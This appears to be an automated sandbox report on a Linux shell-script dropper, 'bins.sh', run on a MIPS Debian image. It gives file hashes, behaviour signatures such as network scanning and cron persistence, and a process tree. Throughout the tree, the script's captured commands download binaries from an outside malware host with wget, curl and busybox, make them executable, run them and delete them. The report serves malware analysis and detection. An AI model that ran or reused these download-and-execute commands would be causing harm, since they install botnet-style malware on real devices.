Analysis

  • max time kernel
    148s
  • max time network
    152s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    05-11-2024 00:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    259c24781ea50ed07083d852383db860

  • SHA1

    bab7105282bcc4a8c8c8ca56fa657b9223c86fab

  • SHA256

    fd9a3d3764a43a1d0cc4af5401c6fb2a4a333c84e66a9323acbd9a5305e9e11c

  • SHA512

    c01d8e62e96c399a6f09da0428927e99c7369da10f5f2f4d5f6893f76205e55302a95e5bcee1d83810485414d7326990c05cf37da31e50a8b531a4deb9862ab1

  • SSDEEP

    192:iz/+WqahFEQu2kVZNy8Qz3nqahFEQEZNy8QzV1/W:iSWqanEQu2kP6qanEQWb

Malware Config

Signatures

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Contacts a large (1944) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 5 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 28 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 8 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:706
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:710
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:716
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • System Network Configuration Discovery
          • Writes file to tmp directory
          PID:736
        • /bin/busybox
          /bin/busybox wget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • System Network Configuration Discovery
          PID:739
        • /bin/chmod
          chmod 777 sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • File and Directory Permissions Modification
          PID:740
        • /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          ./sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • Executes dropped EXE
          PID:741
        • /bin/rm
          rm sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
            PID:743
          • /usr/bin/wget
            wget http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            2⤵
            • System Network Configuration Discovery
            PID:744
          • /usr/bin/curl
            curl -O http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            2⤵
            • System Network Configuration Discovery
            • Writes file to tmp directory
            PID:745
          • /bin/busybox
            /bin/busybox wget http://conn.masjesu.zip/bins/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            2⤵
            • System Network Configuration Discovery
            PID:747
          • /bin/chmod
            chmod 777 zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            2⤵
            • File and Directory Permissions Modification
            PID:748
          • /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            ./zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            2⤵
            • Executes dropped EXE
            PID:749
          • /bin/rm
            rm zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv
            2⤵
              PID:751
            • /usr/bin/wget
              wget http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:752
            • /usr/bin/curl
              curl -O http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:757
            • /bin/busybox
              /bin/busybox wget http://conn.masjesu.zip/bins/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
              2⤵
              • System Network Configuration Discovery
              • Writes file to tmp directory
              PID:777
            • /bin/chmod
              chmod 777 XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
              2⤵
              • File and Directory Permissions Modification
              PID:781
            • /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
              ./XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
              2⤵
              • Executes dropped EXE
              • Renames itself
              • Reads runtime system information
              PID:783
              • /bin/sh
                sh -c "crontab -l"
                3⤵
                  PID:785
                  • /usr/bin/crontab
                    crontab -l
                    4⤵
                      PID:786
                  • /bin/sh
                    sh -c "crontab -"
                    3⤵
                      PID:789
                      • /usr/bin/crontab
                        crontab -
                        4⤵
                        • Creates/modifies Cron job
                        PID:790
                  • /bin/rm
                    rm XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB
                    2⤵
                      PID:795
                    • /usr/bin/wget
                      wget http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                      2⤵
                      • System Network Configuration Discovery
                      PID:799
                    • /usr/bin/curl
                      curl -O http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                      2⤵
                      • System Network Configuration Discovery
                      PID:802
                    • /bin/busybox
                      /bin/busybox wget http://conn.masjesu.zip/bins/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                      2⤵
                      • System Network Configuration Discovery
                      PID:819
                    • /bin/chmod
                      chmod 777 MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                      2⤵
                      • File and Directory Permissions Modification
                      PID:890
                    • /tmp/MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                      ./MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                      2⤵
                        PID:893
                      • /bin/rm
                        rm MjB54RWjLAUM0OKcWv4MJ1Pwc1wKvaLvga
                        2⤵
                          PID:895
                        • /usr/bin/wget
                          wget http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                          2⤵
                            PID:896
                          • /usr/bin/curl
                            curl -O http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                            2⤵
                              PID:898
                            • /bin/busybox
                              /bin/busybox wget http://conn.masjesu.zip/bins/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                              2⤵
                              • Writes file to tmp directory
                              PID:900
                            • /bin/chmod
                              chmod 777 TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                              2⤵
                              • File and Directory Permissions Modification
                              PID:901
                            • /tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                              ./TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                              2⤵
                              • Executes dropped EXE
                              PID:902
                            • /bin/rm
                              rm TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0
                              2⤵
                                PID:904
                              • /usr/bin/wget
                                wget http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                2⤵
                                • System Network Configuration Discovery
                                PID:905
                              • /usr/bin/curl
                                curl -O http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                2⤵
                                • System Network Configuration Discovery
                                PID:906
                              • /bin/busybox
                                /bin/busybox wget http://conn.masjesu.zip/bins/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                2⤵
                                • System Network Configuration Discovery
                                PID:911
                              • /bin/chmod
                                chmod 777 jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                2⤵
                                • File and Directory Permissions Modification
                                PID:912
                              • /tmp/jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                ./jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                2⤵
                                  PID:913
                                • /bin/rm
                                  rm jICtmXt2Yp49dbEHvpunckLjqQZznuY8Hf
                                  2⤵
                                    PID:914
                                  • /usr/bin/wget
                                    wget http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                    2⤵
                                    • System Network Configuration Discovery
                                    PID:915
                                  • /usr/bin/curl
                                    curl -O http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                    2⤵
                                    • System Network Configuration Discovery
                                    PID:916
                                  • /bin/busybox
                                    /bin/busybox wget http://conn.masjesu.zip/bins/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                    2⤵
                                    • System Network Configuration Discovery
                                    PID:917
                                  • /bin/chmod
                                    chmod 777 PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:919
                                  • /tmp/PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                    ./PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                    2⤵
                                      PID:920
                                    • /bin/rm
                                      rm PaIX3rhNmkoIvvq77cuUKsjrJlfrqVAgFz
                                      2⤵
                                        PID:921
                                      • /usr/bin/wget
                                        wget http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                        2⤵
                                        • System Network Configuration Discovery
                                        PID:922
                                      • /usr/bin/curl
                                        curl -O http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                        2⤵
                                        • System Network Configuration Discovery
                                        PID:923
                                      • /bin/busybox
                                        /bin/busybox wget http://conn.masjesu.zip/bins/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                        2⤵
                                        • System Network Configuration Discovery
                                        PID:928
                                      • /bin/chmod
                                        chmod 777 yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                        2⤵
                                        • File and Directory Permissions Modification
                                        PID:929
                                      • /tmp/yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                        ./yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                        2⤵
                                          PID:933
                                        • /bin/rm
                                          rm yrH8pHqGTJHEaZq0VcF9NLtHOFfqt3mYoW
                                          2⤵
                                            PID:934
                                          • /usr/bin/wget
                                            wget http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            2⤵
                                            • System Network Configuration Discovery
                                            PID:935
                                          • /usr/bin/curl
                                            curl -O http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            2⤵
                                            • System Network Configuration Discovery
                                            PID:936
                                          • /bin/busybox
                                            /bin/busybox wget http://conn.masjesu.zip/bins/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            2⤵
                                            • System Network Configuration Discovery
                                            • Writes file to tmp directory
                                            PID:941
                                          • /bin/chmod
                                            chmod 777 fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:942
                                          • /tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            ./fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            2⤵
                                            • Executes dropped EXE
                                            PID:943
                                          • /bin/rm
                                            rm fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL
                                            2⤵
                                              PID:945
                                            • /usr/bin/wget
                                              wget http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                              2⤵
                                              • System Network Configuration Discovery
                                              PID:946
                                            • /usr/bin/curl
                                              curl -O http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                              2⤵
                                              • System Network Configuration Discovery
                                              PID:947
                                            • /bin/busybox
                                              /bin/busybox wget http://conn.masjesu.zip/bins/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                              2⤵
                                              • System Network Configuration Discovery
                                              PID:948
                                            • /bin/chmod
                                              chmod 777 Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                              2⤵
                                              • File and Directory Permissions Modification
                                              PID:953
                                            • /tmp/Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                              ./Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                              2⤵
                                                PID:954
                                              • /bin/rm
                                                rm Ai3wnRK0I5wYoBtHBOmKeNyrsCptUrAbby
                                                2⤵
                                                  PID:955
                                                • /usr/bin/wget
                                                  wget http://conn.masjesu.zip/bins/9cFeF0m7z1ABbUbeeI74twMqXEBb79dgbM
                                                  2⤵
                                                  • System Network Configuration Discovery
                                                  PID:956

                                              Network

                                              MITRE ATT&CK Enterprise v15

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • /tmp/TGZVPthKPk2URap86KcG8IC5ua8ThuC3t0

                                                Filesize

                                                119KB

                                                MD5

                                                1b166b95f9cb4b079ef1b9ec8363ddf3

                                                SHA1

                                                0d8eb08add467b3b5474f9b25909297fe7c2839c

                                                SHA256

                                                94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

                                                SHA512

                                                983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

                                              • /tmp/XTAo5MqVmMfqhymGAjJEyyLqShLNrvbKxB

                                                Filesize

                                                151KB

                                                MD5

                                                3c90d5820bddcf7c5d1bd21dfa49d958

                                                SHA1

                                                5ba05bd489e50af97d6dc45e3a0be60e494d5083

                                                SHA256

                                                bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

                                                SHA512

                                                54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

                                              • /tmp/fJt9D2310BbiJL7sbRe1v7Nf33jlW0b6aL

                                                Filesize

                                                127KB

                                                MD5

                                                89077b7bd4bcafca7713be43635c4862

                                                SHA1

                                                fc02edb8fba29ea8ee99e6157ef8560334530052

                                                SHA256

                                                78416feab0c93152d65acc8f48835520db083cc3aed0aea622b9fb88284dc00d

                                                SHA512

                                                1b457b8f8d452eecaad9013241e50672befb70feb5349f5fa72d62ea1fa8affa968763e6511cc76cdc5bf12f080e4a8f10c8e141ccd0d36794e721d690f2c4b1

                                              • /tmp/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6

                                                Filesize

                                                122KB

                                                MD5

                                                cd3d4b9c643e5b473fb4d88ed05f0716

                                                SHA1

                                                64ee7a97418583d759eaea8000890cc3bae1b5f4

                                                SHA256

                                                0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944

                                                SHA512

                                                164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52

                                              • /tmp/zFbUyvnPBWDQyH7aTTtBjrIrXRrpao7Xdv

                                                Filesize

                                                16B

                                                MD5

                                                7689ca8c5bc85cf6b78ef89323d4df6a

                                                SHA1

                                                a1392ec3b571b3de167f0b9a5dadab4f14a2db76

                                                SHA256

                                                17dcc5c5df80bfe98d30dd8eb7e0de5875d0e4560a0f23e5acb0b13ef1a1a3c5

                                                SHA512

                                                40f543b232d42b9b7796382c15de33e682111685ad7ae87be455d0d8d3e48866dfc137f4555b8bc6bf03ac5dde233c8f20e8c4f220c05c71892de0ce14691471

                                              • /var/spool/cron/crontabs/tmp.YNfwEz

                                                Filesize

                                                210B

                                                MD5

                                                4fa62c6bdf22036bd712f91f1f2c65e3

                                                SHA1

                                                241ae40d9a93ed7f5f997d78ed2476ee7a2aa2e0

                                                SHA256

                                                be72fe178b170b26bed393df6fea58d18a134466ead83ee379b8bae366818e97

                                                SHA512

                                                a336432b22beb0c9627895acd0f62a24c5ec2718b00df7cac83fe2d6347faa8463df38a0edad1a06d63eaae9b2db1a855aeed6bfdda8a25aff3e78137a8418f1